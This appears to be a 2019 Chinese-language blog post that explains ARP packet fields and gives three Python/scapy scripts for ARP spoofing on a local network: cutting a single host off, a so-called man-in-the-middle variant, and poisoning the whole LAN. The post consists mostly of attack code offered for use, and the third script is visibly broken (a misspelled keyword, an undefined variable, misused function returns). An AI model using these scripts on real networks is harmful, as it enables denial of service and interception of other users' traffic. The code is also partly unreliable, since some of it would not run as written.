Fidcer'Blog

python 实现局域网内arp欺骗

字数统计: 455阅读时长: 2 min
2019/02/21 Share
arp协议数据包

请输入图片描述
op:1(op值为1说明这是一次arp请求)
hwsrc:发送方MAC地址(即本机器MAC地址)
psrc:发送方ip地址(即本机内网ip地址)
hwdst:目标MAC地址(在这里为未知00:00:00:00:00:00)
pdst:目标ip地址(即网关ip地址,一般为192.168.0.1/192.168.1.1)
局域网内所有机器接收此arp请求,如果发现请求的ip为自己的ip便会向请求机器发送arp响应,将自己的MAC地址带入arp响应包单播发送给请求的机器,arp响应包主要字段如下
op:2(op值为2说明这是一次arp响应)
hwsrc:发送方MAC地址(即网关MAC地址)
psrc:发送方ip地址(即网关ip地址)
hwdst:目标MAC地址(为发起arp请求的机器的MAC地址)
pdst:目标ip地址(为发起arp请求的机器的ip地址)

代码1:
对单个ip进行arp欺骗 断网

1
2
3
4
5
6
7
8
9
10
# -*- coding=utf-8 -*-
from scapy.all import *
tip = "192.168.235.136"
gip = "192.168.235.2"
tmip = getmacbyip(tip)
gmip = getmacbyip(gip)
localmac = get_if_hwaddr("eth0")
sendArp = Ether(dst=tmip,src=localmac)/ARP(op=1,psrc=gip,hwsrc=localmac,pdst=tip,hwdst=tmip)
while 1:
sendp(sendArp,inter=2,iface="eth0")

arp欺骗中间人攻击

1
2
3
4
5
6
7
8
9
10
# -*- coding=utf-8 -*-
from scapy.all import *
tip = "192.168.235.136"
gip = "192.168.235.2"
tmip = getmacbyip(tip)
gmip = getmacbyip(gip)
localmac = get_if_hwaddr("eth0")
sendArp = Ether(dst=tmip,src=localmac)/ARP(op=1,psrc=gip,hwsrc=gmip,pdst=tip,hwdst=tmip)
while 1:
sendp(sendArp,inter=2,iface="eth0")

arp 欺骗整个局域网:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# -*- coding=utf-8 -*-
from scapy.all import *
#tip = "192.168.235.136"
gip = "192.168.235.2"
#tmip = getmacbyip(tip)
gmip = getmacbyip(gip)
localmac = get_if_hwaddr("eth0")
sendArp = srploop(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(hwsrc=gmip,psrc=gip,op=2))
while 1:
try:
sendp(sendArp,inter=2,iface="eth0")
if is_sigint_up:
print "exit"
is_sigint_up=False
cotinue
except:
break
CATALOG